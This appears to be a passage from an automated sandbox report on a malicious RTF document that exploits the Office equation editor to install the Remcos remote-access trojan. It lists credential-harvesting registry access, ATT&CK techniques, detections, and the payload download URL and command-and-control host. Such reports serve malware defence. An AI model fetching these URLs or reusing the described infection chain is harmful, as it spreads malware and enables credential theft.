                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                        Yara detected WebBrowserPassView password recovery tool
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Detected Remcos RAT
                        Source: C:\Users\user\AppData\Roaming\hjc.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1Jump to behavior
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\fggrt\logs.dat, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information11
                        Scripting                        		1
                        Valid Accounts                        		1
                        Native API                        		11
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		33
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts33
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Bypass User Account Control                        		2
                        Obfuscated Files or Information                        		21
                        Input Capture                        		1
                        System Network Connections Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Command and Scripting Interpreter                        		1
                        Valid Accounts                        		1
                        Valid Accounts                        		1
                        Install Root Certificate                        		1
                        Credentials in Registry                        		4
                        File and Directory Discovery                        		SMB/Windows Admin Shares2
                        Email Collection                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron21
                        Registry Run Keys / Startup Folder                        		1
                        Access Token Manipulation                        		1
                        DLL Side-Loading                        		1
                        Credentials In Files                        		47
                        System Information Discovery                        		Distributed Component Object Model21
                        Input Capture                        		1
                        Remote Access Software                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
                        Process Injection                        		1
                        Bypass User Account Control                        		LSA Secrets1
                        Query Registry                        		SSH2
                        Clipboard Data                        		2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                        Registry Run Keys / Startup Folder                        		11
                        Masquerading                        		Cached Domain Credentials13
                        Security Software Discovery                        		VNCGUI Input Capture223
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Valid Accounts                        		DCSync1
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Modify Registry                        		Proc Filesystem3
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadow1
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Access Token Manipulation                        		Network Sniffing1
                        Remote System Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                        Process Injection                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1430800 Sample: OKhCyJ619J.rtf Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 103 Snort IDS alert for network traffic 2->103 105 Found malware configuration 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 25 other signatures 2->109 9 WINWORD.EXE 336 13 2->9         started        11 Rdxcjsng.PIF 2->11         started        14 remcos.exe 2->14         started        17 3 other processes 2->17 process3 dnsIp4 19 EQNEDT32.EXE 12 9->19         started        24 EQNEDT32.EXE 9->24         started        123 Multi AV Scanner detection for dropped file 11->123 125 Detected Remcos RAT 11->125 127 Machine Learning detection for dropped file 11->127 73 web.fe.1drv.com 14->73 75 oqgpra.db.files.1drv.com 14->75 81 4 other IPs or domains 14->81 77 web.fe.1drv.com 17->77 79 web.fe.1drv.com 17->79 83 10 other IPs or domains 17->83 signatures5 process6 dnsIp7 65 103.198.26.173, 49163, 80 NXGNET-AS-APNextgenNetworksAU unknown 19->65 53 C:\Users\user\AppData\Roaming\hjc.exe, PE32 19->53 dropped 55 C:\Users\user\AppData\Local\...\HJC[1].exe, PE32 19->55 dropped 111 Office equation editor establishes network connection 19->111 113 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->113 26 hjc.exe 3 10 19->26         started        file8 signatures9 process10 dnsIp11 67 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49164, 49165 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 26->67 69 web.fe.1drv.com 26->69 71 4 other IPs or domains 26->71 57 C:\Users\Public\Libraries\netutils.dll, PE32+ 26->57 dropped 59 C:\Users\Public\Libraries\easinvoker.exe, PE32+ 26->59 dropped 61 C:\ProgramData\Remcos\remcos.exe, PE32 26->61 dropped 63 2 other malicious files 26->63 dropped 129 Multi AV Scanner detection for dropped file 26->129 131 Contains functionality to bypass UAC (CMSTPLUA) 26->131 133 Detected Remcos RAT 26->133 135 5 other signatures 26->135 31 remcos.exe 3 14 26->31         started        36 extrac32.exe 1 26->36         started        38 cmd.exe 26->38         started        file12 signatures13 process14 dnsIp15 85 kenoss.duckdns.org 31->85 87 kenoss.duckdns.org 103.186.117.100, 1166, 49170, 49171 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 31->87 89 7 other IPs or domains 31->89 49 C:\ProgramData\fggrt\logs.dat, data 31->49 dropped 91 Multi AV Scanner detection for dropped file 31->91 93 Detected Remcos RAT 31->93 95 Machine Learning detection for dropped file 31->95 101 3 other signatures 31->101 40 remcos.exe 31->40         started        43 remcos.exe 31->43         started        45 remcos.exe 31->45         started        47 3 other processes 31->47 51 C:\Users\Public\Libraries\Rdxcjsng.PIF, PE32 36->51 dropped 97 Drops PE files with a suspicious file extension 36->97 file16 99 Uses dynamic DNS services 85->99 signatures17 process18 signatures19 115 Tries to steal Instant Messenger accounts or passwords 40->115 117 Tries to steal Mail credentials (via file / registry access) 40->117 119 Searches for Windows Mail specific files 40->119 121 Tries to harvest and steal browser information (history, passwords, etc) 45->121

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        OKhCyJ619J.rtf55%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                        OKhCyJ619J.rtf100%AviraHEUR/Rtf.Malformed

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\Public\Libraries\netutils.dll100%AviraTR/AVI.Agent.rqsyc
                        C:\Users\Public\Libraries\Rdxcjsng.PIF100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\hjc.exe100%Joe Sandbox ML
                        C:\ProgramData\Remcos\remcos.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe100%Joe Sandbox ML
                        C:\ProgramData\Remcos\remcos.exe71%ReversingLabsWin32.Backdoor.Remcos
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe71%ReversingLabsWin32.Backdoor.Remcos
                        C:\Users\user\AppData\Roaming\hjc.exe71%ReversingLabsWin32.Backdoor.Remcos
                        C:\Users\Public\Libraries\Rdxcjsng.PIF71%ReversingLabsWin32.Backdoor.Remcos
                        C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
                        C:\Users\Public\Libraries\netutils.dll83%ReversingLabsWin64.Trojan.Acll

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.imvu.comr0%URL Reputationsafe
                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                        http://ocsp.sectigo.com00%URL Reputationsafe
                        http://ocsp.entrust.net030%URL Reputationsafe
                        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                        https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                        http://geoplugin.net/json.gp/C100%URL Reputationphishing
                        http://ocsp.entrust.net0D0%URL Reputationsafe
                        http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                        https://sectigo.com/CPS00%URL Reputationsafe
                        http://geoplugin.net/json.gp100%URL Reputationphishing
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                        http://ocsp.sectigo.com0C0%URL Reputationsafe
                        http://www.ebuddy.com0%URL Reputationsafe
                        http://103.198.26.173/360/HJC.exe0%Avira URL Cloudsafe
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                        http://crl.comode0%Avira URL Cloudsafe
                        https://www.adobe.0%Avira URL Cloudsafe
                        http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
                        https://support.google.comH0%Avira URL Cloudsafe
                        http://103.198.26.173/360/HJC.exej0%Avira URL Cloudsafe
                        http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
                        http://103.198.26.173/360/HJC.exehhC:0%Avira URL Cloudsafe
                        http://geoplugin.net/json.gpg0%Avira URL Cloudsafe
                        uckdns.org0%Avira URL Cloudsafe
                        https://www.adobe.c0%Avira URL Cloudsafe
                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        dual-spov-0006.spov-msedge.net
                        		13.107.137.11
                        		truefalse
                          		unknown
                          kenoss.duckdns.org
                          		103.186.117.100
                          		truetrue
                            		unknown
                            geoplugin.net
                            		178.237.33.50
                            		truefalse
                              		unknown
                              oqgpra.db.files.1drv.com
                              		unknown
                              		unknownfalse
                                		high
                                onedrive.live.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://103.198.26.173/360/HJC.exetrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  uckdns.orgtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geoplugin.net/json.gptrue
                                  • URL Reputation: phishing
                                  		unknown
                                  https://onedrive.live.com/download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rsfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://b.scorecardresearch.com/beacon.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://acdn.adnxs.com/ast/ast.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                      		high
                                      http://www.imvu.comrremcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvF6ED.tmp.13.drfalse
                                        		high
                                        http://crl.comoderemcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://ocsp.sectigo.com0hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://ocsp.entrust.net03hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://103.198.26.173/360/HJC.exejEQNEDT32.EXE, 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://support.google.com/chrome/?p=plugin_flashremcos.exe, 00000014.00000003.427230433.0000000002096000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.426945991.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427677327.00000000020AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                              		high
                                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.adobe.remcos.exe, 0000000D.00000003.422403574.000000000026E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.426945991.0000000001C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.diginotar.nl/cps/pkioverheid0hjc.exe, 00000005.00000002.372380692.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                		high
                                                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                  		high
                                                  https://deff.nelreports.net/api/report?cat=msnbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
